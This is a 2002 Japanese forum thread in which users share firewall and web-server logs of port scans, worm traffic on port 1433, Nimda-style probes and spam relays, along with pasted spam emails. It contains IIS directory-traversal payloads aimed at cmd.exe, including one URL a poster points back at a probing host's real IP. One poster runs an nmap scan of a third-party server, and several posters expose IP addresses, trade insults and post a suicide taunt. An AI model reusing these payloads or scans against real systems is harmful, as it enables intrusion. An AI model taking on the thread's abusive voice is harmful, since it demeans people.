From:E-MailSavings< [email protected] >
To: [email protected] [email protected]
[email protected] [email protected]
Subject:SALE->VideoSurveillance,UNDER$50BUCKS!
Received:from[216.34.75.50]by l3.3web45.com with ESMTP id **
Received:(qmailinvokedfrom6)
Received:from mail.link2buy.com (216.34.74.50) by 10.3.220.33 with SMTP From [email protected]
Message-ID:< [email protected] >
In less than 10 minutes, you can set up a professional surveillance camera without ever breaking a sweat. How?
Introducing the XCam2, a wireless video camera that broadcasts LIVE COLOR video to any TV, VCR or PC* within 100 feet.
That means no wires and no mess!
If you order now, you'll also receive a FREE motion-activated VCR Commander: automatically record video from your camera straight
to your VCR! Gigantic $100 VALUE!
This is a recurring mailing. If you wish to unsubscribe from this list, please click here, reply to this email with "unsubscribe"
as the subject, or copy and paste the link below into your browser address bar.
http://link2buy.com/c/ES/[email protected]&P=ES2044_20020515_665
Any third-party offers contained in this email are the sole responsibility of the offer originator.
Copyright 2002 E-MailSavings

第三者中継可能？　スパムメールより
mail.ombramarketing.com
>RSET
<250 flushed
>MAIL FROM:< [email protected] >
<250 ok
>RCPT TO:< relaytest%[email protected] >
<250 ok

mail.link2buy.com
inbound02.link2buy.com
>RSET
<250 flushed
>MAIL FROM:< [email protected] >
<250 ok
>RCPT TO:< relaytest%[email protected] >
<250 ok

To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( [email protected] [email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".

ttp://www.093019.com
ttp://889860.com/?kg
ttp://117114.com/?kg　　いずれもHNとメアド変えての悪徳サイト誘導

１分２回のペースでポートスキャンやって来る
暇人？？？アフォ？？
晒しage
210.236.64.130

>>244
魔法のあいらんどが被害受けやすいよね。
ただ、リンクが張れないので削除するのがオチ(ｗ

>>245
てめーは>>1を読め。

ニムダもコードレッドも毎日だな。
だいたい平均すると２０件くらいかな。
さて、多いのか少ないのか。

From:EqualaMAIL< [email protected] >
To : [email protected] [email protected]
[email protected] [email protected]
[email protected]
Subject:Offensive content on YOUR PC? Find out now!
Received:from[66.70.89.20] by link2buy.com with ESMTP id ** Received:by dpm1.emailsvc.net (PowerMTA(TM) v1.5)
(envelope-from< [email protected] >)
Received: from mail (10.224.72.159) by 10.0.0.2 with SMTP
From [email protected]
Message-ID:< [email protected] >
=============================================================================
The following offer was mailed by EqualaMAIL on behalf of contentwatch.com
=============================================================================
Think there's no offensive content on your PC? Think again.
It's possible to pick up objectionable files by accident
from the Internet!
Check now to be sure you're safe!
FREE PC Check! No Obligation. Just Information.
http://track.coopt.com/track.php?c_lid=1146&c_uid=12345678.
==========================================================================
This EqualaMAIL Promotion was sent to you as a valued subscriber.
If you would rather not receive emails from EqualaMail and would like to
delete your name from our list please click below:
http://track.coopt.com/members/[email protected]&a=12345678.
Questions, Opinions or Feedback
Email: [email protected] or
write at: Equalamail, PO Box 23248, Ft. Lauderdale, Fl. 33307
==========================================================================

第三者中継可能？
Equalamail.emailsvc.net
>>> RSET
<<< 250 flushed
>>> MAIL FROM:< [email protected] >
<<< 250 ok
>>> RCPT TO:< relaytest%[email protected] >
<<< 250 ok

To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/[email protected]
http://opt-out.offer888.net/?e=
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( [email protected]
[email protected] [email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".

>>241

プロクシ

http://www.google.co.jp/search?hl=ja&q=tcp+port+3128&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

>>1　さんのガイドラインに沿って晒します

(1)アドレス=211.133.251.18
(2)時刻=2002/05/19 22:53:30
(3)手口=FTP port probe ただしBlackIceでFireWalled

そいで、解析スレっつーことで、相手の素性を調査：
nmap -v -sS -F -P0 -O sv.ranklink.net
Interesting ports on sv.ranklink.net (211.133.251.18):
(The 1093 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop-3
5432/tcp open postgres
8082/tcp open blackice-alerts
Remote operating system guess: Linux 2.1.19 - 2.2.19
Uptime 295.763 days (since Sat Jul 28 04:48:29 2001)
TCP Sequence Prediction: Class=random positive increments
Difficulty=3492248 (Good luck!)
IPID Sequence Generation: Incremental
※nmapのバージョンは V. 2.54BETA34 (Win32用をWidows2000で使用した)

あと、この人筑波に住んでる？

>>252
わぉ。

>>252
× ※nmapのバージョンは V. 2.54BETA34 (Win32用をWidows2000で使用した)
○ × ※nmapのバージョンは V. 2.54BETA34 (Win32用をWindows2000で使用した)

>>253 晒してください！

>>254
nmapNT？

>255
nmapNTは知らない

NTで使いたいなら、nmap.zip で検索すれば少し古いバージョンは手に
入り、それをNTでも使えるのかもしれません（私Win2kつかってるので
よくわかりません）。

公式サイトは
http://www.tux.org/pub/security/
で、ここにはソースからおいてあります。 Windowsユーザーで、Visual
C++ Ver 6 以降を所有しているならばこのソース（というかワークス
ペースからして用意してくれているという親切ぶり）をDLしてコンパイル
すれば最新版が手に入りますです。

enjoy!

>256　間違いが多くてすいません

公式サイトを書き間違い：
× http://www.tux.org/pub/security/
○ www.insecure.org/nmap

× した所にはコンパイラ持ってない人にとっていいもの
があるかもね。

>>256-257
あ、nmapNTってこれのことです。
http://www.eeye.com/html/Research/Tools/nmapNT.html

66.70.89.20,portmap をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 66.70.89.20,portmap
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 218.50.3.25,12345
ﾌﾟﾛｾｽ名は N/A
218.50.3.25
inetnum 218.50.0.0 - 218.55.255.255
address Hanaro Telecom Co.
address Kukje Electornics Cneter Bldg. 1445-3 Seocho-Dong Seocho-Ku
address SEOUL
address 137-070
country KR

>>249
■■■■■■■■■■■■■■■■■■■■■■■■■■■

　　　　　　ス　パ　ム　晒　し　厨　房　う　ざ　い　！！！

■■■■■■■■■■■■■■■■■■■■■■■■■■■

ダラダラと本文まで貼り付けんなよ！！

お前がこのスレではスパムだ！！！

>>258 知りませんでした。　ご紹介ありが�d

Name: mauve.demon.co.uk
Address: 158.152.209.66
このドメイン怖いんだけど((((；ﾟДﾟ))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>262 普通の会社だと思われ

ｋ

131.220.47.119

ボン大学、、、

どういう表示が不正アクセスで、
また、どういう表示は不正アクセスではないのか。
そのへんを、きみたちに問うてみたい。

今日はMS-SQL(1433/tcp)へのスキャンが多いYO!
((((；ﾟДﾟ))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>267
確かに多いと思う。
なんか穴でも見つかったのかな。

CERTに出てる既出の穴狙いかね

http://www.incidents.org/archives/intrusions/msg12714.html
あっちでも多いようだ。祭りか？((((；ﾟДﾟ))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

1433のscanが増加傾向だって
http://isc.incidents.org/
ランキングはまだ微妙
http://www.dshield.org/topports.html

それにしても、MS-SQL鯖なんて多いのか？

ＳＱＬとＳｕｎＯＳ？
同じところから何度も来ます。
64.32.34.235,ms-sql-s をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 64.32.34.235,ms-sql-s
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 66.114.67.28,3628
ﾌﾟﾛｾｽ名は N/A

64.32.34.235,portmap をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 64.32.34.235,portmap
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 198.77.197.105,1985
ﾌﾟﾛｾｽ名は N/A

"Voyager Alpha Force"ってwormの仕業らしいよ
http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q313418

((((；ﾟДﾟ))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ 　ﾓｳﾈﾙﾍﾞｻ…

>>270
www.dshield.org ｲｲ!
最初のページの Top Attacker: 210.75.212.23 に藁多

heisei.fjct.fit.ac.jp 福岡工業大学晒しage
（・∀・）ｲｲ!

９時前に帰宅してからこれまでにms-sql-sを４発ブロック
したが全部USからだな。

>>272

MSで出ているWormの名前と違う、"sqlsnake"タンの仕業との情報あり
http://www.incidents.org/diary/diary.php?id=156

ここ数日のグラフの伸びが素敵。
http://isc.incidents.org/port_details.html?port=1433&tarax=1

いやぁ ポート1433を探すのが流行ってますね

以下のリストは、BlackICEのログです。
17日から21日までの3.5日間ほどのログの一部です。
（ログに含まれる他の詳細情報とHTTPの接続要求の受信は回数が多いため削除するなどを行い編集しました。）

プロバイダはDION ADSL
このPCにはルータでDMZ設定を行い ポート1-65536 TDP/TCP 宛てのパケット全てが
到着するようにしています。

このPCをインターネットに接続していた時間は1日あたり平均 約10時間であるため
このログは、およそ84時間分の記録と考えられます。

そして、ポート1433への接続の試みが行われたことを示す項目数は 30回 ありました。
（この30回という数値はこのパーソナルファイヤーフォールが「アタックを受けた時間間隔や
　アタッカーのIPアドレスが異なる」など条件が満たされ1項目分のアタックとして
　ロギングされた回数なのでをポート1433への接続の試みが行われた回数はさらに多くなる）

つまり、およそ 168分（2時間20分）毎に、このアタックがあった事がわかりました。

ログ 4 of 1
02-05-17 01:31:19 RPC TCP port probe 4.2.160.3 1 port=111 ~
02-05-17 01:59:51 DNS TCP port probe 193.195.96.14 2 port=53 leisurejobs.net
02-05-17 02:19:01 DNS TCP port probe 211.74.159.41 1 port=53 h41.159.74.211.seed.net.tw
02-05-17 09:17:29 RPC TCP port probe 211.97.55.20 1 port=111 ~
02-05-17 11:13:14 RPC TCP port probe 210.244.204.180 1 port=111 MS2
02-05-17 13:14:24 LPR port probe 211.62.58.44 2 port=515 ~
02-05-17 13:26:04 RPC TCP port probe 210.224.147.62 1 port=111 ~
02-05-17 16:51:57 SMTP port probe 162.84.130.40 2 port=25 JKNKHKJH-K330ZR
02-05-17 20:21:23 DNS TCP port probe 61.219.244.251 1 port=53 ~
02-05-17 21:56:54 SMTP port probe 218.144.22.161 3 port=25 SA-OURV0VR9WCD0
02-05-17 22:07:11 DNS TCP port probe 62.16.196.5 2 port=53 ~
02-05-18 02:49:00 DNS TCP port probe 202.79.66.57 2 port=53 ~
02-05-18 07:08:47 SubSeven port probe 203.232.40.208 4 port=27374 OEMCOMPUTER
02-05-18 08:33:53 LPR port probe 211.239.184.31 2 port=515 ~
02-05-18 08:46:14 DNS TCP port probe 202.188.31.227 2 port=53 ~
02-05-18 10:13:20 RPC TCP port probe 202.118.236.135 1 port=111 pact4.pact.hit.edu.cn

ログ 4 of 2
02-05-19 01:16:20 RPC TCP port probe 212.22.34.130 1 port=111 correo.iberaval.es
02-05-19 02:12:56 RPC TCP port probe 203.215.164.11 2 port=111 ~
02-05-19 03:50:01 LPR port probe 24.126.129.223 1 port=515 c-24-126-129-223.we.client2.attbi.com
02-05-19 04:00:55 DNS TCP port probe 211.250.197.126 2 port=53 ~
02-05-19 09:41:05 SOCKS port probe 65.190.37.9 4 port=1080 dsl-65-190-37-9.telocity.com
02-05-19 12:02:37 DNS TCP port probe 212.90.203.234 2 port=53 ~
02-05-19 12:58:17 RPC TCP port probe 150.185.79.129 1 port=111 ~
02-05-19 13:06:07 DNS TCP port probe 217.57.186.200 2 port=53 host200-186.pool21757.interbusiness.it
02-05-19 16:24:20 RPC TCP port probe 210.175.75.9 1 port=111 ~
02-05-19 17:04:40 RPC TCP port probe 210.175.52.3 1 port=111 news.echna.ne.jp
02-05-19 17:42:14 SMTP port probe 61.72.218.82 3 port=25 SA-OURV0VR9WCD0
02-05-19 23:00:24 DNS TCP port probe 202.79.66.57 2 port=53 ~
02-05-20 00:23:42 DNS TCP port probe 210.96.73.200 2 port=53 ~
02-05-20 03:03:33 DNS TCP port probe 211.35.133.208 3 port=53 KEIC_SERVER
02-05-20 04:27:48 NetBus port probe 24.217.165.157 4 port=12345 PAVILION
02-05-20 04:27:48 SOCKS port probe 24.217.165.157 4 port=1080 PAVILION
02-05-20 05:26:36 RPC TCP port probe 193.140.145.25 1 port=111 BIM
02-05-20 05:41:43 SMTP port probe 61.177.33.113 1 port=25 ~

ログ 4 of 3
02-05-20 05:41:45 Proxy port probe 61.177.33.113 6 port=3128|8080|80 ~
02-05-20 05:41:47 SOCKS port probe 61.177.33.113 6 port=1080 ~
02-05-20 11:37:15 DNS TCP port probe 210.115.229.55 2 port=53 dongkuk.ce.hallym.ac.kr
02-05-20 17:02:47 RPC TCP port probe 211.23.252.210 1 port=111 211-23-252-210.HINET-IP.hinet.net
02-05-20 17:15:20 SQL port probe 209.219.130.139 3 port=1433 ~
02-05-20 18:11:09 SQL port probe 216.129.1.4 3 port=1433 PDCAGRI
02-05-20 19:12:11 SQL port probe 216.167.37.117 4 port=1433 WEB1099
02-05-20 19:38:01 DNS TCP port probe 61.56.235.49 1 port=53 adsl-61-56-235-49.NHON.sparqnet.net
02-05-20 22:20:58 SQL port probe 203.152.56.158 4 port=1433 BBTWEB
02-05-21 04:35:32 SQL port probe 61.32.141.67 3 port=1433 WEB
02-05-21 04:55:08 SQL port probe 61.151.246.157 3 port=1433 WANGHUI
02-05-21 05:51:10 SQL port probe 210.112.234.5 3 port=1433 DBSERVER
02-05-21 06:15:00 SQL port probe 207.50.192.80 3 port=1433 SBSKARLI
02-05-21 07:07:27 SQL port probe 211.74.145.45 4 port=1433 GOD
02-05-21 07:15:16 SQL port probe 211.181.150.97 4 port=1433 OP1000
02-05-21 07:17:12 SQL port probe 211.46.80.138 3 port=1433 IFHAN
02-05-21 08:26:40 SQL port probe 211.54.65.130 2 port=1433 GAIA
02-05-21 08:39:46 SQL port probe 66.162.243.19 3 port=1433 MAUI
02-05-21 08:42:40 SQL port probe 211.236.70.176 3 port=1433 ARK
02-05-21 09:44:36 SQL port probe 64.76.48.140 3 port=1433 LEARNINGSERVER
02-05-21 09:53:51 SQL port probe 209.61.184.91 3 port=1433 SERVER91

ログ 4 of 4
02-05-21 10:57:29 SQL port probe 203.108.98.96 4 port=1433 WEBSERVER
02-05-21 10:58:22 SQL port probe 211.178.48.43 3 port=1433 RSUN
02-05-21 11:16:00 SQL port probe 204.184.58.251 3 port=1433 MOE
02-05-21 11:16:08 SQL port probe 64.221.188.116 4 port=1433 COSMIC
02-05-21 11:44:40 SubSeven port probe 62.179.53.75 3 port=27374 KUBA
02-05-21 12:39:56 SubSeven port probe 24.222.51.129 3 port=27374 s51n129.tru.eastlink.ca
02-05-21 12:41:33 SQL port probe 61.221.242.236 4 port=1433 NOB
02-05-21 12:57:18 SQL port probe 203.234.41.119 4 port=1433 KOLIS
02-05-21 13:18:06 SQL port probe 128.239.99.216 3 port=1433 ARC-WEB
02-05-21 13:33:41 SQL port probe 209.218.48.8 3 port=1433 mail.insert.com
02-05-21 14:01:40 SQL port probe 64.212.159.135 3 port=1433 BOB-SUNBURY
02-05-21 14:07:53 SQL port probe 203.233.112.113 3 port=1433 WEBMAIL
02-05-21 14:09:27 SQL port probe 200.223.149.69 4 port=1433 BZS2
02-05-21 14:51:32 SQL port probe 210.207.67.134 4 port=1433 NTEX03
02-05-21 15:00:36 SQL port probe 65.34.23.148 2 port=1433 JLGUI-002
02-05-21 15:27:05 SQL port probe 66.149.65.44 4 port=1433 MERIDIAN


--- 以上で報告で終わりです ありがとうございました ---

ホントSQL多いよな

ちょと多すぎ。1433 はワームじゃないのか?

>>277
見事な説明, ただものではないな.
ポートつつかれて侵入とか言ってるメデタイ奴とは大違い

>>283
同意 SQLのセキュリティホールをついた新種のワームかも知れない

>>208
偶然見つけたけど 61.177.33.113 は漏れのとこにもプロキシ来てたぞ（ｗ
ちなみにプロバイダはkurafty氏に同じくDION

今見たら昨日だけで 8回もアタックあり!((（;ﾟДﾟ）))))))
韓国×2
台湾×1
中国×1
.org たぶんアメリカ×1

1433が0400(JST)前後にどっと来た。急にログ増えて焦ったよｗ

1433
昨日だけで51回。今日は既に16回。（いずれも同一IPは除く）
さっきログ開いてちょっと驚いたのでこのスレ覗いてみました。

不正アクセスが１週間以上、一件もも来なくて逆に怖い・・・

不正アクセスはなかなかないだろう

[email protected] <[email protected]>

Time, Event, Intruder, Count
2002/05/22 07:42:17, SQL port probe, 61.145.116.165, 3
2002/05/22 06:42:47, SQL port probe, 115.137.76.211.symphox.com, 3
2002/05/22 06:02:42, SQL port probe, user-vc8fsu1.biz.mindspring.com, 3
2002/05/22 05:52:36, SQL port probe, 202.106.108.195, 3
2002/05/22 05:36:34, SQL port probe, 211.208.178.170, 3
2002/05/22 05:07:24, SQL port probe, ext005805bea.bea.com, 3
2002/05/22 04:39:00, SQL port probe, 211.172.228.49, 3
2002/05/22 04:17:36, SQL port probe, 202.96.111.40, 3
2002/05/22 03:26:50, SQL port probe, mainserver.smadv.com, 3
2002/05/22 02:46:16, SQL port probe, 210.78.147.85, 3
2002/05/22 00:41:18, SQL port probe, 200.174.17.12, 3
2002/05/21 23:33:03, SQL port probe, c193.h203149152.is.net.tw, 3
2002/05/21 22:49:32, SQL port probe, 204.49.141.50, 3
2002/05/21 22:46:53, SQL port probe, 193.195.132.2, 3

Spidaキタ━━━━━━（゜∀゜≡゜∀゜）━━━━━━!!!!!
http://japan.ahnlab.com/news/view.asp?seq=147&pageNo=1&news_gu=01

Received:from 212.96.209.242(EHLO mail.admradugny)(212.96.209.242) by **withSMTP
Received:from smtp0000.mail.yahoo.com (phys068a.chem.msu.ru [195.208.208.79])
by mail.admradugny with SMTP (Microsoft Exchange Internet Mail Service Version 5.50.1000.10)
Reply-to: [email protected]
From: [email protected]
To:
Subject:NakedPicsIPromised3719
Remember me?
Click here to see the nude pictures of me that Lucky Ass took.
Click here if you want me to remove you from my address book and e-mail list.
http://www.free-porn-space.com/optout.html

195.208.208.79
inetnum: 195.208.208.0 - 195.208.223.255
netname: MSUNET
descr: Moscow State University
descr: Vorobjovy Gory, Moscow, Russia
country: RU
notify: [email protected]
admradugny.ru
問題あり：不正な中継を受け付けます。
(212.96.209.242)
ORDB database...登録されています。
maps realtime blackhole list...登録されていません。

おとといまではｐｉｎｇがほとんどだったけど、昨日今日と
SQL、HTTP Proxy Scanが多発しててキモイよ〜

とか書いてたら姦国からSQLがきやがった

>>296
ﾏｼﾞｳｻﾞｲねSQL
能豚先生の警告窓が昨日からもう50回以上開いてるよ・・・

検索したけどSQLってなんだか結局よくわからなかった。

sqlsnakeﾀﾝはSpida wormって言われはじめたYO!

ZDnetにも出たYO!
http://www.zdnet.co.jp/news/0205/22/ne00_spida.html

>>298
情報ありが�d
とすると漏れにできることは別にないのか・・・

とか書きこんでる間にもまた1433が・・・
ｳｻﾞ-

61.115.79.40
HEIDI-DOMSV
1433Microsoft-SQL-Server

DNS: heidi.as.wakwak.ne.jp
Node: HEIDI-DOMSV
Workgroup: HEIDI
NetBIOS: __MSBROWSE__
MAC: 0000E24FA20B

いろんなＩＰからポート80をスキャンされまくってるんだけど
これもなんかのワームかなぁ？

ｳｾﾞｪ

>>301
それって自分のｗｗｗアクセスを勘違いしているだけだよ・・・
このヴォケ！

>>302
あんたアフォ？

>>302
基地外の勘違いが見れるスレはここですか？

>>303-304＝>>301＝低学歴ＤＱＮ

>301

それはもはや古典の域に入ってるな。
nimdaかなんかだろ。

>>274
heisei.fjct.fit.ac.jp　が　1位GET???

http://www.dshield.org/top10.html

>>301
スキャンって意味わかるかなぁ、ぼくちゃん（ｗ

ナマでバコバコやるな

昨日位からやたら1433番ポート叩かれてるんだけど
これってＳＱＬ鯖のデフォルトだよね
穴でも見つかったの？

>>310
５０個程過去に遡ってみ

>>309

種馬@常時ナマで中出し ですが、何か

ここの所、ポート1433ばっかりスキャンされてるからヘンだなとは思ってたけど、そういう事だったのか。

Nature Magazineを見ているとき、
こんなところからトロイの木馬を突っ込んできた。

（（（（（（；ﾟДﾟ））））））ｶﾞｸｶﾞｸﾌﾟﾙﾌﾟﾙ (

21.249.242.9 2002/05/08 22:35
DDN-RVN (NET-DDN-RVN)
7990 Science Applications Court
Vienna, VA 22183-7000 US
http://www.lightwavecomm.net/mar_full.html

ちなみに、ここ↓にも報告は皆無。
http://isc.incidents.org/port_details.html?port=1433&tarax=1

世界中でウィルス学者が１４人も相次いで不審な死を遂げているし、
Marylandといえばフォート・デトリック研究所のあるとこだし、

（（（（（（；ﾟДﾟ））））））ｶﾞｸｶﾞｸﾌﾟﾙﾌﾟﾙ (

　

SQLあげ

朝からオンラインにしてるけどSQL１発しか来ないな。
対策進んでるのかな？

昨日だけで30回突破したぞ！ほとんど米国からだったが韓国からもあり（;ﾟДﾟ）
これはサイバーウォーだな??

>これはサイバーウォーだな??
ﾜﾛﾀ

あー、勝手にエクスプローラーがたちあがった・・・

防火壁にアラーム無し・・・


侵入されますた？

鬱出し脳

>>320
ノートンが干渉してるんじゃないよね？

>>318
漏れは昼頃からOnline。
17発来たよ。
昨日よりはいくらかﾏｼって程度。
1433祭りはまだ続いている気配ﾃﾞｽ

From:"Wireless Offers"< [email protected] >
Reply-To: [email protected]
To: [email protected] [email protected]
[email protected] [email protected]
Subject:Greetings,whyhaven'tyouclaimedyourFREEphone?
Received:from [66.185.166.50] by ** with ESMTP id **
Received:(qmailinvokedbyuid9)
Message-ID:< [email protected] >
*Free phone offer subject to VoiceStream Wireless credit approval.
A one-time activation fee of $25 applies to all new activations.
Coverage not available in all areas. Offer fulfilled by SimplyWireless.com,
a VoiceStream authorized dealer. See site for additional offer details.
**$30 mail-in rebate is available for new VoiceStream service plans $30
and greater. $30 mail-in rebate valid until 13/32/00.
This e-mail was sent to you by Clickformail.com
on behalf of SimplyWireless.com. You are receiving
this e-mail because you are registered with Clickformail.com
or one of it's affiliates, and agreed at that time
to receive special offers via e-mail. If you no longer want to receive e-mail from Clickformail.com please click the remove link found on this page to be removed immediately.
The preceding message was sent to you as an opt-in subscriber to ClickforMail.
If you wish to unsubscribe please follow this link:
http://c4m.2net34.com/[email protected]
lick here if you want me to remove you from my address book and e-mail list. http://www.free-porn-space.com/optout.html
To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/[email protected]

ﾌｧｲｱｳｫｰﾙは 61.193.187.166. から、このｺﾝﾋﾟｭｰﾀ (ICMP Unreachable) への ｲﾝﾀｰﾈｯﾄ ｱｸｾｽをﾌﾞﾛｯｸしました。
アイ・ピー・レボルーションが何の様だ？
（（（（（（；ﾟДﾟ））））））ｶﾞｸｶﾞｸﾌﾟﾙﾌﾟﾙ

ノートンセキュリティ
24.103.216.193　backdoor

昨日から今に掛けて80回も不正進入試行試みられています。
そのほとんどがCHINANETとかでています。（リモホ218.84.81.14等）

ポートも1900やら520やら80やらつつかれているのですが、
これってやられっぱなしでほっとくしかないんですか？
ほんとにやめてホスィ。

SQL収まったかと思ったら、またアタックされだしたよ....

66.185.166.50,27374 をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 66.185.166.50,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.207.232.221,3086
ﾌﾟﾛｾｽ名は N/A

66.185.166.50,ftp をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 66.185.166.50,ftp
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 68.80.43.184,ftp
ﾌﾟﾛｾｽ名は N/A

202.238.79.243
何故???(((( ;ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>323
だから、ＳＰＡＭを全文貼るなって！

オメエがこのスレではＳＰＡＭなんだよ！
この鬼血骸野郎！！

>>330
オメエがこのスレではＳＰＡＭなんだよ！
この鬼血骸野郎！！
オメエがこのスレではＳＰＡＭなんだよ！
この鬼血骸野郎！！
オメエがこのスレではＳＰＡＭなんだよ！
この鬼血骸野郎！！
オメエがこのスレではＳＰＡＭなんだよ！
この鬼血骸野郎！！

ﾌｧｲｱｳｫｰﾙは 210.51.9.230 (TCP Port 4064) [TCP Flags: S]. から、このｺﾝﾋﾟｭｰﾀ (HTTP) への ｲﾝﾀｰﾈｯﾄ ｱｸｾｽをﾌﾞﾛｯｸしました。
これはどうゆう意味だ

>>331
ばか丸出し。

さっさと回線切って、ケーブルでさくっと首吊っちゃえよ。

>>332
君のような馬鹿は説明してもわからんと思う・・・

>>334
お前実は分からないんだろ(爆

>>335
（ ﾟДﾟ)ﾊｧ?
実際やっているけど。

きちがいは何を言い出すかわからないねぇ。

やっぱ>>1の理念は消し飛んじまったなぁ…

(HTTP) への ｲﾝﾀｰﾈｯﾄ ｱｸｾｽをﾌﾞﾛｯｸ
このへんで分かれよ

>>333
∧＿∧　　 ／￣￣￣￣￣￣￣￣￣￣￣
　　（　´_ゝ`）＜　で？
　　（　　　　） 　＼＿＿＿＿＿＿＿＿＿＿＿
　　 ｜ ｜　|
　　（_＿）＿)

>>339
さくっと耳が切れたようだな。

>>340 のズラ、オツム、オムツのずれ。

61.194.43.6

>340
俺は「聞く耳持たず」の表現だとｵﾓﾀｰﾖ

218.52.112.254からPort80にアクセス
ルータで外部からのアクセスは全て蹴っているはずなのだが。
韓国からのアクセスというのが不気味だ。

inetnum: 218.50.0.0 - 218.55.255.255
netname: HANANET
descr: Hanaro Telecom Co.
descr: Kukje Electornics Cneter Bldg. 1445-3 Seocho-Dong Seocho-Ku
country: KR

[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/scripts/root.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/MSADC/root.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/c/winnt/system32/cmd.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/d/winnt/system32/cmd.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/scripts/..ﾁ../winnt/system32/cmd.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/scripts/..ﾀｯ../winnt/system32/cmd.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/scripts/..ﾁ・./winnt/system32/cmd.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Tue May 21 10:31:16 2002] [error] [client 43.235.16.82] File does not exist: /usr/apache/htdocs/scripts/..%2f../winnt/system32/cmd.exe

usenみたいなので、
43.235.16.76/29でフィルター切りました。

http://43.235.16.82/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

pc.2ch.net,http をﾌﾞﾛｯｸしました｡ 詳細:
ｱｳﾄﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 160.85.58.212,1520
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは pc.2ch.net,http
ﾌﾟﾛｾｽ名は �Z:ﾔ�Z:ﾔ
160.85.58.212
inetnum: 160.85.0.0 - 160.85.255.255
netname: TWI
descr: Zurich University of Applied Sciences Winterthur (ZHW)
descr: Winterthur, Switzerland
country: CH

相変わらず、各国のＮＩＣ（ネットワークインフォメーションセンター）の

ドメイン情報貼って喜んでるヴァカいるな（ｗ













DNSを勉強しろと言いたい

>>349 は、
カンジダ症　クリプトコッカス症　クリプトスポリジウム症　サイトメガロウィルス感染症　
単純ヘルペスウィルス感染症　カポジ肉腫　原発性脳リンパ腫リンパ性間質性肺炎　非定型抗酸菌症　
カリニ肺炎　進行性多発性白質脳症　トキソプラズマ脳症　化膿性細菌感染症　コクシジオイド真菌症　
エイズ脳症　ヒトプラズマ症　イソスポラ症　非ホジキンリンパ腫　活動性結核
サルモネラ菌血症　ＨＩＶ消耗性症候群　反復性肺炎　浸潤性子宮頸ガン

時間, イベント, 侵入者, カウント
02/05/25 13:12:09, RPC CALLIT ping, YahooBB218139112017.bbtec.net, 4

[ ADDRESS ]
